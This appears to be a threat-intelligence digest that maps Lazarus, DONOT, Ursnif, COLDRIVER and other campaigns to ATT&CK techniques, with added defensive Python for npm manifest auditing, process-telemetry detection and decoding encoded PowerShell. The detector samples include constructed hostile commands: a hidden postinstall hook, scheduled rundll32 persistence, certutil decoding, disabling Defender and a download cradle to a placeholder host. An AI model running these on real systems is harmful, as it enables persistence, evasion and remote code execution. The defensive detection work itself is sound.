Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure

T1566.001 – The attacker sends a phishing email containing a malicious link to a GitHub repository disguised as a legitimate project.

T1133 – The attacker hosts malicious code, disguised as an NPM package, on a public GitHub repository.

T1059.003 – The victim, a developer, uses the npm install command to install the malicious NPM package from the GitHub repository.

T1543 – The malicious NPM package contains a script that executes a malicious JavaScript file (‘test.js’) located in the ‘.vscode’ folder, establishing persistence on the victim’s machine.

T1071.001 – The malicious JavaScript file uses the cURL command to communicate with the attacker’s C2 server over HTTP to download additional payloads.

T1041 – The attacker uses the established C2 channel to exfiltrate sensitive data from the victim’s machine.
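The chain above depends on an npm lifecycle hook firing during `npm install` and running a script tucked into a hidden `.vscode` folder. Reviewing the manifest's lifecycle scripts before installing from an unfamiliar repository catches this pattern cheaply. The following is an added example, not code from the report or from the malicious package; the two manifests it inspects are constructed for illustration.

```python
"""Audit an npm package.json for lifecycle scripts that run hidden files or fetch from the network.

Added example (not from the original report). npm executes the hooks listed in
LIFECYCLE_HOOKS automatically during install, so that is where a lure like the
one above places its loader. Both manifests below are constructed.
"""
import json
import re

# Hooks npm runs without any explicit action from the developer.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Install-time code that pulls content from the network deserves a second look.
NETWORK_TOOLS = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I)


def hidden_components(cmd):
    """Return directory components beginning with '.' found in a shell command.

    '.', '..' and npm's own '.bin' are excluded; '.vscode', '.github' etc. are returned.
    """
    hidden = []
    for token in cmd.split():
        parts = re.split(r"[/\\]", token.strip("'\""))
        # Only directories (components followed by another component) are considered.
        for part in parts[:-1]:
            if part.startswith(".") and part not in (".", "..", ".bin"):
                hidden.append(part)
    return hidden


def audit_manifest(manifest_text):
    """Return (hook, reason, command) findings for suspicious lifecycle scripts in a package.json."""
    findings = []
    scripts = json.loads(manifest_text).get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hidden = hidden_components(cmd)
        if hidden:
            findings.append((hook, f"runs code from hidden directory {', '.join(hidden)}", cmd))
        if NETWORK_TOOLS.search(cmd):
            findings.append((hook, "fetches content from the network at install time", cmd))
    return findings


# Constructed manifest resembling the lure: a postinstall hook that runs .vscode/test.js.
LURE_MANIFEST = json.dumps({
    "name": "yacht-club-dashboard",
    "version": "1.0.0",
    "scripts": {"build": "tsc -p .", "test": "jest", "postinstall": "node .vscode/test.js"},
})

# Constructed benign manifest: ordinary scripts, including npm's own .bin directory.
CLEAN_MANIFEST = json.dumps({
    "name": "ordinary-lib",
    "version": "2.3.1",
    "scripts": {"build": "tsc -p .", "test": "./node_modules/.bin/jest", "prepare": "npm run build"},
})

if __name__ == "__main__":
    for hook, reason, cmd in audit_manifest(LURE_MANIFEST):
        print(f"[{hook}] {reason}: {cmd}")
```

Run it against a cloned repository's package.json before `npm install`; a finding is a reason to read the referenced file, not proof of malice, since some legitimate packages do run install-time code.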

Lazarus Lure in Yacht Club

The Lazarus group is conducting a spearphishing campaign targeting individuals involved in the maritime industry, particularly yacht and luxury vessel sales, using malicious attachments to deliver malware.

China shopping for Black Friday Gains

SilkSpecter actors are targeting online shoppers during the Black Friday period with spearphishing emails containing malicious attachments. These attachments likely contain obfuscated malware designed to evade detection and exfiltrate sensitive information like credit card details.

Financially Motivated Chinese Threat Actor SilkSpecter Targeting Black Friday Shoppers

  • SilkSpecter used spearphishing emails with malicious attachments (T1566) to target Black Friday shoppers.
  • The attachments likely contained malware, which, when executed, established a connection to the threat actor’s command-and-control (C2) server using common protocols like HTTP or HTTPS (T1071).
  • This allowed the attackers to steal sensitive information like credit card details and personally identifiable information (PII) and send it back to their C2 server (T1041).

DONOT Hunt Me

A threat actor is utilizing spearphishing emails with malicious attachments to gain initial access, establish persistence via scheduled tasks, and exfiltrate data over HTTP.

DONOT APT Attack

  1. The attacker sends a spearphishing email containing a malicious Office document that exploits the vulnerability CVE-2017-11882.
  2. Upon opening the document, the exploit triggers, allowing the attacker to execute a command that launches the next stage of the attack.
  3. A scheduled task named “Schedule” is created to execute a malicious DLL file via rundll32.exe every 5 minutes, ensuring persistence.
  4. The scheduled task establishes communication with the attacker’s command-and-control (C2) server using the HTTP protocol.
  5. The attacker sends commands and exfiltrates data over the established C2 channel.

Ursnif Trojan – Stealthy Memory Execution

T1566.001 – Attackers send emails containing a malicious LNK file disguised as a PDF document, likely targeting business professionals in the United States.

T1140 – The LNK file uses certutil.exe to decode a Base64-encoded payload.

T1562.004 – The malware uses PowerShell commands to disable Windows Defender.

T1059.003 – The decoded payload is executed using cmd.exe, leading to the execution of the Ursnif banking Trojan.

T1071.001 – The malware establishes communication with a command-and-control (C2) server using web protocols, likely HTTP or HTTPS.

T1041 – The malware exfiltrates stolen sensitive information, such as banking credentials and personal data, to the C2 server.
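Both the DONOT chain (schtasks running rundll32 every five minutes) and the Ursnif chain (certutil decoding a payload, PowerShell disabling Defender, cmd.exe executing the result) are built from Windows' own binaries, so they surface in process-creation telemetry rather than in file hashes. The block below is an added example, not code from the report: it runs a few rules over constructed process events and correlates hits per host. Field names (ts, host, parent, image, cmdline) are an assumption standing in for Sysmon Event ID 1 or Security 4688 fields.

```python
"""Detect the living-off-the-land steps from the DONOT and Ursnif chains in process telemetry.

Added example (not from the original report). Each rule is a predicate over one
process-creation event; hosts where two or more distinct rules fire within a
short window are reported as a chain. Events below are constructed, and the
field names are an assumed schema, not a vendor format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

RULES = [
    ("certutil decodes an encoded file (T1140)",
     lambda ev: re.search(r"certutil(\.exe)?\b.*\s-decode(hex)?\b", ev["cmdline"], re.I)),
    ("PowerShell disables a Defender feature (T1562.004)",
     lambda ev: re.search(r"powershell.*set-mppreference.*-disable\w+", ev["cmdline"], re.I)),
    ("schtasks creates a minute-interval task running rundll32",
     lambda ev: re.search(r"schtasks(\.exe)?\b.*/create\b(?=.*/sc\s+minute)(?=.*rundll32)",
                          ev["cmdline"], re.I)),
    # Noisy on its own (legitimate tasks also do this); it earns weight through correlation.
    ("rundll32 started by the Task Scheduler service (svchost.exe)",
     lambda ev: ev["image"].lower() == "rundll32.exe" and ev["parent"].lower() == "svchost.exe"),
]


def match_rules(event):
    """Return the names of all rules that fire on one process-creation event."""
    return [name for name, pred in RULES if pred(event)]


def detect(events, window_minutes=10):
    """Return (alerts, chains).

    alerts: one dict per rule hit. chains: host -> sorted rule names, for hosts
    with at least two distinct rules firing within window_minutes of that host's first hit.
    """
    alerts = []
    for ev in events:
        for name in match_rules(ev):
            alerts.append({"ts": ev["ts"], "host": ev["host"], "rule": name, "cmdline": ev["cmdline"]})
    by_host = defaultdict(list)
    for alert in alerts:
        by_host[alert["host"]].append(alert)
    chains = {}
    window = timedelta(minutes=window_minutes)
    for host, hits in by_host.items():
        hits.sort(key=lambda a: a["ts"])
        first = datetime.fromisoformat(hits[0]["ts"])
        rules = {a["rule"] for a in hits if datetime.fromisoformat(a["ts"]) - first <= window}
        if len(rules) >= 2:
            chains[host] = sorted(rules)
    return alerts, chains


# Constructed sample telemetry: a DONOT-style host, an Ursnif-style host and a benign admin host.
EVENTS = [
    {"ts": "2024-11-18T09:00:05", "host": "WS-DONOT", "parent": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c schtasks /create /sc minute /mo 5 /tn Schedule /tr "rundll32.exe C:\\Users\\Public\\sample.dll,Start"'},
    {"ts": "2024-11-18T09:01:00", "host": "WS-DONOT", "parent": "svchost.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\Public\\sample.dll,Start"},
    {"ts": "2024-11-18T10:15:00", "host": "WS-URSNIF", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c certutil -decode C:\\Users\\Public\\invoice.pdf.txt C:\\Users\\Public\\stage.bat"},
    {"ts": "2024-11-18T10:15:03", "host": "WS-URSNIF", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2024-11-18T10:15:06", "host": "WS-URSNIF", "parent": "cmd.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c C:\\Users\\Public\\stage.bat"},
    {"ts": "2024-11-18T11:00:00", "host": "WS-ADMIN", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil -verify -urlfetch C:\\certs\\server.cer"},
    {"ts": "2024-11-18T11:05:00", "host": "WS-ADMIN", "parent": "cmd.exe", "image": "schtasks.exe",
     "cmdline": "schtasks /query /tn Backup"},
]

if __name__ == "__main__":
    alerts, chains = detect(EVENTS)
    for alert in alerts:
        print(f"{alert['ts']} {alert['host']}: {alert['rule']}")
    for host, rules in chains.items():
        print(f"CHAIN on {host}: {' + '.join(rules)}")
```

The per-host correlation is what makes the noisy signals usable: a scheduled task launching rundll32 is routine on its own, but paired with a task created from an Office child process it matches the DONOT sequence described above.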

COLDRIVER – SPICA malware

The APT group COLDRIVER uses spearphishing to deliver malware, using PDFs as lure documents.

COLDRIVER – UNC4057, Star Blizzard and Callisto

The attacker, impersonating experts or affiliates, sends a phishing link or document containing a link to a “decryption” utility. This utility is malware (SPICA backdoor) that gives the attacker access to the victim’s machine. The malware establishes persistence, communicates with a C2 server using JSON over WebSockets, and then collects and exfiltrates data.

The Bear and the Shell

T1566.001 – Procedure: The adversary sent spearphishing emails to individuals and organizations critical of the Russian government, using lures such as NASA job offers and articles from independent Russian media outlets. The emails contained malicious ZIP files with LNK files disguised as PDFs. When opened, these executed a PowerShell script to install a reverse shell.

T1059.001 – Procedure: The LNK file, when opened, executes a PowerShell script that decodes and executes a Base64-encoded command. This command downloads and installs the HTTP-Shell, a multiplatform reverse shell.

T1036 – Procedure: The adversary used a NASA-themed lure and designed the command-and-control server to resemble a legitimate PDF editing site to avoid detection.

T1071.001 – Procedure: The HTTP-Shell uses web protocols (HTTP) to communicate with the command-and-control server, enabling the adversary to send commands and receive data.

T1041 – Procedure: The HTTP-Shell allows the adversary to upload and download files, likely facilitating the exfiltration of data from the victim’s machine over the established command-and-control channel.
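In the chain above the downloader is hidden behind a Base64-encoded PowerShell command, so process telemetry records only the encoded blob. Decoding it is the first triage step, and the same helper applies to any encoded PowerShell command line. The block below is an added example, not code from the report or from the HTTP-Shell project; the two command lines it analyses are constructed here, and the indicator list is a starting set, not an exhaustive one.

```python
"""Decode PowerShell -EncodedCommand arguments and flag download-cradle indicators.

Added example (not from the original report). PowerShell encodes the script as
UTF-16LE then Base64; the flag may be abbreviated (-e, -ec, -enc, ...). Sample
command lines below are constructed and point at the reserved .invalid TLD.
"""
import base64
import re

# Common spellings of the flag; PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"^-(?:e|ec|enc|encoded(?:c(?:ommand)?)?)$", re.I)

# Indicators are searched in the outer command line and in the decoded script.
INDICATORS = {
    "download cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer",
        re.I),
    "runs downloaded text": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "URL": re.compile(r"https?://[^\s'\"]+", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "nested base64": re.compile(r"FromBase64String", re.I),
}


def extract_encoded(cmdline):
    """Return the decoded script for an encoded PowerShell command line, or None if there is none."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENC_FLAG.match(tok):
            blob = tokens[i + 1].strip("'\"")
            try:
                raw = base64.b64decode(blob, validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                return None
            return raw.decode("utf-16-le", errors="replace")
    return None


def analyze(cmdline):
    """Decode an encoded command line and return the decoded text plus sorted indicator names."""
    script = extract_encoded(cmdline)
    text = cmdline if script is None else cmdline + "\n" + script
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"decoded": script, "indicators": hits}


def encode_ps(script):
    """Encode a script the way PowerShell expects for -EncodedCommand; used only to build the samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: a downloader resembling the chain above, and a benign encoded command.
DOWNLOADER_CMD = ("powershell.exe -w hidden -nop -enc "
                  + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/update')"))
BENIGN_CMD = "powershell.exe -EncodedCommand " + encode_ps("Get-Date -Format o")

if __name__ == "__main__":
    for cmd in (DOWNLOADER_CMD, BENIGN_CMD):
        result = analyze(cmd)
        print(f"decoded : {result['decoded']}")
        print(f"flags   : {', '.join(result['indicators']) or 'none'}")
```

Feed it the command-line field from process-creation events; a decoded script with a URL plus a cradle and an invoke indicator is the shape of the first stage described above, while an encoded command with no indicators is usually an administrative script that was encoded to dodge quoting problems.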